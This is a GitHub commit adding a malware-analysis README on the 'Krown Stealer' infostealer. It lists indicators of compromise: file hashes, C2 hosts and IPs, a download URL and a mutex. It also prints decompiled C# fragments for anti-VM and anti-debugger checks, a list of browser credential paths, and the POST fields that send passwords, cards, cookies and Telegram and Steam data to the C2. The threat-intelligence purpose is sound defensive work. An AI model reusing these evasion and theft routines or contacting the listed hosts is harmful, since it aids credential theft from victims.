Krown

albertzsigovits · Jan 23, 2020 · 6d3163a · 6d3163a
1 parent cd0bd78
commit 6d3163a
Showing 1 changed file with 246 additions and 0 deletions.
diff --git a/Krown/README.md b/Krown/README.md
@@ -0,0 +1,246 @@
+# Krown Stealer
+
+## Developer:
+https://t.me/expl01t_z  
+
+## Deepweb forums:
+```
+https://skynetzone.org/threads/krown-stealer-tvoj-vybor-na-rynke.14703/
+https://xakerpro.ru/topic/10355/
+https://teletype.in/@exploit_dar/rJcbPLamB
+https://teletype.in/@exploit_dar/rkQLnoAFH
+```
+
+## Hashes
+30485e32f095374168c12454fea8c8175c9233a6a800f1985f702e04ed2630f5
+fa4204a84e4ccc0a3b4603e053dacf4f0d153844f8bcf2af597c35962eb9ffb6
+a0430d8c9fea6603ef8a512542e3c8863aa67c594bf09b718c29d630006a03a5
+3a666cdb9d44450daf89c27fdf11e9a35a075cb92e77b45f2fd13481debdac4d
+b43af2361cfffe0046c94f566487b5de16b958a3da8bfcc20e789c42cdd5fecc
+8b208fd67c36ecaa43988049edcf136f6cd8b86423a8d158c9929aca8da049d9
+dc453a73c59e9cd4cad5c6f80b3d0835fb48b61e8599b64287b375e0a484b3b0
+34b0d0fef7ce3b70e8cdaaaf78273ec834b461897dda4c7c5a31a689e2a218f5
+1bb68089b70a2e1de747550da79010fd0594ff368678c04a0e9496b5b31a7f6e
+29ec8a562965da7e029a785a784f8ee4e530e1ea62f01e321430aa16264a8815
+db6c38e55ef827e159d8ba5b0030520ea081e0f47deab544ac2e0fa163a8bf65
+cc83bf122b4e8be42a8d35d264d7768d218211b197bb54293c26a7b237bfda82
+db783c3c806e08298d907f39fdc6bcd846821c4d702c6a4c96459631f2b2bb38
+fc1e2e7cfbded57dc58e3469fdda8f52737d1853b432f83b9acc92f723373eda
+
+## C2 servers:
+```
+185.228.232.72
+a0362255.xsph.ru
+deathgame.net
+exporhub.pp.ua
+gamefpsbuster.ru
+h143466.s22.test-hf.su
+```
+
+## C2 response:
+```
+1,1,1,1,1,1,1,1,.cs:.log:.txt:.doc:.docx:.cpp:.sql,1001,1,https://h143466.s22.test-hf.su//update//svupdate.exe,1
+```
+
+## C2 resources:
+```
+apps/
+	config.php
+assets/
+auth.php
+BD.sql
+converter.php
+dashboard.php
+footer.template
+gate.php
+header.template
+index.php
+logout.php
+presets.php
+profiles.php
+search.php
+settings.php
+users.php
+viewer.php
+```
+
+## ITW names:
+```
+D1onis.exe
+```
+
+## Internet check-in:
+```
+ip.42.pl/raw
+```
+
+## Mutex:
+```
+\AppData\Local\Temp\admin.krown
+```
+
+## RC4 key:
+```
+private static int key = 666;
+```
+
+## Source code:
+### Mutex:
+```
+public static void MutexCheck()
+{
+	try
+	{
+		if (File.Exists(Dirs.Temp + "\\" + Environment.UserName + ".krown"))
+		{
+			Helpers.Suicide();
+			Environment.Exit(0);
+		}
+		else
+			{
+			File.Create(Dirs.Temp + "\\" + Environment.UserName + ".krown");
+			}
+		}
+		catch
+		{
+		}
+	}
+```
+
+### Country blacklist:
+```
+Dirs.BlackList = new string[]
+	{
+		"ru",
+		"uk",
+		"be",
+		"kz",
+		"ka",
+		"ky",
+		"uz"
+	};
+```
+
+### Hardcoded supported browsers:
+```
+Dirs.BrowsCC = new string[]
+	{
+		Dirs.LocalAppData + "\\Google\\Chrome\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.AppData + "\\Opera Software\\Opera Stable\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Kometa\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Orbitum\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Comodo\\Dragon\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Amigo\\User\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Torch\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\CentBrowser\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Go!\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\uCozMedia\\Uran\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\MapleStudio\\ChromePlus\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Yandex\\YandexBrowser\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\BlackHawk\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\AcWebBrowser\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\CoolNovo\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Epic Browser\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Baidu Spark\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Rockmelt\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Sleipnir\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\SRWare Iron\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Titan Browser\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Flock\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Vivaldi\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Sputnik\\User Data\\Default\\" + Dirs.WebData,
+		Dirs.LocalAppData + "\\Maxthon\\User Data\\Default\\" + Dirs.WebData
+	};
+```
+
+```
+public static string[] Processes = new string[]
+	{
+		"HttpAnalyzer",
+		"Dumper",
+		"Reflector",
+		"Wireshark",
+		"WPE",
+		"ProcessExplorer",
+		"IDA",
+		"HTTP Debugger Pro",
+		"The Wireshark Network Analyzer",
+		"WinDbg",
+		"Colasoft Capsa",
+		"smsniff",
+		"Olly",
+		"OllyDbg",
+		"WPE PRO",
+		"Microsoft Network Monitor",
+		"Fiddler",
+		"SmartSniff",
+		"Immunity Debugger",
+		"Process Explorer",
+		"PE Tools",
+		"AQtime",
+		"DS-5 Debug",
+		"Dbxtool",
+		"Topaz",
+		"FusionDebug",
+		"NetBeans",
+		"Rational Purify",
+		".NET Reflector",
+		"Cheat Engine",
+		"Sigma Engine"
+	};
+```
+
+## Anti-VM:
+```
+public static void SandboxieDetect()
+	{
+		if (AntiAnalyses.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
+		{
+			Environment.Exit(0);
+		}
+	}
+```
+
+```
+public static void VMDetect()
+	{
+		using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
+		{
+			using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
+			{
+				foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
+				{
+					string text = managementBaseObject["Manufacturer"].ToString().ToLower();
+					if ((text == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox")
+					{
+						Environment.Exit(0);
+					}
+				}
+			}
+		}
+	}
+```
+
+## C2 POST data:
+```
+Post_File.name.Add("hwid", hwid);
+Post_File.name.Add("os", value2);
+Post_File.name.Add("platform", value);
+Post_File.name.Add("profile", value3);
+Post_File.name.Add("user", Environment.UserName);
+Post_File.name.Add("passwordsCount", value4);
+Post_File.name.Add("cccount", value5);
+Post_File.name.Add("ccount", value9);
+Post_File.name.Add("fcount", "null");
+Post_File.name.Add("telegram", value6);
+Post_File.name.Add("cookies", value7);
+Post_File.name.Add("steam", value8);
+```
+
+## Encryption:
+```
+string target = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ";
+byte[] data = Program.StringToByteArray("687474703a2f2f646561746867616d652e6e65742f676174652e706870");
+byte[] bytes = Encoding.Default.GetBytes(Encrypt.XOR(target));
+string @string = Encoding.Default.GetString(Encrypt.Encrypt_RC4(bytes, data));
+```